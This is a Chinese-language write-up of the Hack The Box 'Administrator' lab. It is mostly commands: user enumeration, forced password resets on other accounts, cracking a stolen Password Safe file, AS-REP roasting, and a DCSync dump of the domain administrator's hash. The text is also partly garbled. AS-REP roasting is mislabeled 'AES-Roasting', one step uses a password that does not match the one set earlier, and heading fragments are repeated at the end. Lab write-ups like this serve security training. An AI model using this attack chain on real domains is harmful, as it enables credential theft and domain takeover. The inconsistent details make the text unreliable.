HTB Administrator 靶机渗透测试详细教程<\/h1>

1. 初始信息收集<\/h2>

1.1 Nmap 扫描<\/h3>

首先使用 Nmap 对目标进行扫描，识别开放的服务和端口：<\/p>

nmap -sV -sC -p- 10.10.11.42
<\/code><\/pre>
2. SMB 服务枚举<\/h2>
2.1 用户名枚举<\/h3>
使用 crackmapexec 进行 SMB 用户名枚举：<\/p>
crackmapexec smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --rid-brute | grep SidTypeUser
<\/code><\/pre>
2.2 AES-Roasting 攻击<\/h3>
尝试对 Kerberos 进行 AES-Roasting 攻击，获取用户票据。<\/p>
3. 域内信息收集<\/h2>
3.1 BloodHound 分析<\/h3>
使用 BloodHound 收集和分析域内关系：<\/p>
bloodhound-python -d administrator.htb -u Olivia -p ichliebedich -ns 10.10.11.42 -c All
<\/code><\/pre>
分析发现：<\/p>

Olivia 用户对 Michael 拥有完全控制权限<\/li>
Michael 用户对 Benjamin 拥有权限<\/li>
<\/ul>
4. 权限提升路径<\/h2>
4.1 利用 Olivia 控制 Michael<\/h3>

登录 Olivia 账户：<\/li>
<\/ol>
crackmapexec smb 10.10.11.42 -u Olivia -p ichliebedich
<\/code><\/pre>

修改 Michael 的密码：<\/li>
<\/ol>
rpcclient -U Olivia \/\/10.10.11.42
> setuserinfo2 Michael 23 'newpassword123'
<\/code><\/pre>
4.2 利用 Michael 控制 Benjamin<\/h3>

登录 Michael 账户：<\/li>
<\/ol>
crackmapexec smb 10.10.11.42 -u Michael -p newpassword123
<\/code><\/pre>

尝试修改 Benjamin 密码（WinRM 方式失败）：<\/li>
<\/ol>
rpcclient -U Michael \/\/10.10.11.42
> setuserinfo2 Benjamin 23 '12345678'
<\/code><\/pre>
或者使用 bloodyAD：<\/p>
bloodyAD -u "Michael" -p "12345678" -d "administrator.htb" --host "10.10.11.42" set password "Benjamin" "12345678"
<\/code><\/pre>
5. 获取 Benjamin 的 FTP 访问权限<\/h2>
5.1 枚举 Benjamin 的权限<\/h3>
crackmapexec smb 10.10.11.42 -u Benjamin -p 12345678
<\/code><\/pre>
5.2 访问 FTP 并下载文件<\/h3>
ftp 10.10.11.42
# 使用 Benjamin:12345678 登录
> get Backup.psafe3
<\/code><\/pre>
5.3 破解 Password Safe 文件<\/h3>

提取 hash：<\/li>
<\/ol>
pwsafe2john Backup.psafe3 > hash.txt
<\/code><\/pre>

使用 John the Ripper 破解：<\/li>
<\/ol>
john --wordlist=\/usr\/share\/seclists\/Passwords\/Leaked-Databases\/rockyou.txt hash.txt
<\/code><\/pre>
得到密码：tekieromucho<\/code><\/p>
6. 进一步权限提升<\/h2>
6.1 使用新凭证枚举<\/h3>
现在拥有以下凭证：<\/p>

Olivia:ichliebedich<\/li>
Michael:newpassword123<\/li>
Benjamin:12345678<\/li>
从 psafe 文件中获取的其他凭证<\/li>
<\/ul>
6.2 BloodHound 分析新路径<\/h3>
发现 Emily 用户对 Ethan 有 Generic Write 权限。<\/p>
6.3 利用 Emily 账户<\/h3>

尝试 WinRM 登录：<\/li>
<\/ol>
crackmapexec winrm 10.10.11.42 -u user.txt -p pass.txt --continue-on-success
<\/code><\/pre>

发现 user.txt 文件<\/li>
<\/ol>
6.4 修改 Ethan 的 Kerberos 设置<\/h3>
通过 Emily 账户，设置 Ethan 用户不需要 Kerberos 预认证：<\/p>
Get-ADUser ethan | Set-ADAccountControl -doesnotrequirepreauth $true
<\/code><\/pre>
6.5 对 Ethan 进行 AES-Roasting 攻击<\/h3>

获取 Ethan 的 TGT：<\/li>
<\/ol>
impacket-GetNPUsers administrator.htb\/ethan -dc-ip 10.10.11.42 -no-pass
<\/code><\/pre>

使用 hashcat 破解：<\/li>
<\/ol>
hashcat -m 18200 ethan.hash \/usr\/share\/seclists\/Passwords\/Leaked-Databases\/rockyou.txt --force
<\/code><\/pre>
得到密码：limpbizkit<\/code><\/p>
7. 最终域控提权<\/h2>
7.1 使用 DCSync 攻击<\/h3>
利用 Ethan 的凭证进行 DCSync 攻击获取域控 hash：<\/p>
impacket-secretsdump administrator.htb\/ethan:limpbizkit@10.10.11.42 -dc-ip 10.10.11.42 -just-dc-user administrator
<\/code><\/pre>
7.2 获取 Administrator 的 NTLM hash<\/h3>
得到 Administrator 的 NTLM hash：<\/p>
7b1247f21518cf5e74225f468c60e90d
<\/code><\/pre>
8. 总结<\/h2>
整个攻击路径如下：<\/p>

通过 SMB 枚举发现 Olivia 账户<\/li>
利用 Olivia 控制 Michael<\/li>
通过 Michael 控制 Benjamin<\/li>
从 Benjamin 的 FTP 获取密码文件并破解<\/li>
发现 Emily 控制 Ethan 的路径<\/li>
修改 Ethan 的 Kerberos 设置并进行 AES-Roasting<\/li>
最终通过 DCSync 获取域管权限<\/li>
<\/ol>
关键点：<\/p>

正确使用 BloodHound 分析域内关系<\/li>
合理利用每个账户的权限进行横向移动<\/li>
组合使用多种攻击方法（AES-Roasting, DCSync 等）<\/li>
<\/ul>

HTB Administrator 靶机渗透测试详细教程<\/h1>

1. 初始信息收集<\/h2>

2. SMB 服务枚举<\/h2>

2.2 AES-Roasting 攻击<\/h3> 尝试对 Kerberos 进行 AES-Roasting 攻击，获取用户票据。<\/p>

3. 域内信息收集<\/h2>

4. 权限提升路径<\/h2>

5. 获取 Benjamin 的 FTP 访问权限<\/h2>

6.2 BloodHound 分析新路径<\/h3> 发现 Emily 用户对 Ethan 有 Generic Write 权限。<\/p>

2.2 AES-Roasting 攻击<\/h3>
尝试对 Kerberos 进行 AES-Roasting 攻击，获取用户票据。<\/p>

6.2 BloodHound 分析新路径<\/h3>
发现 Emily 用户对 Ethan 有 Generic Write 权限。<\/p>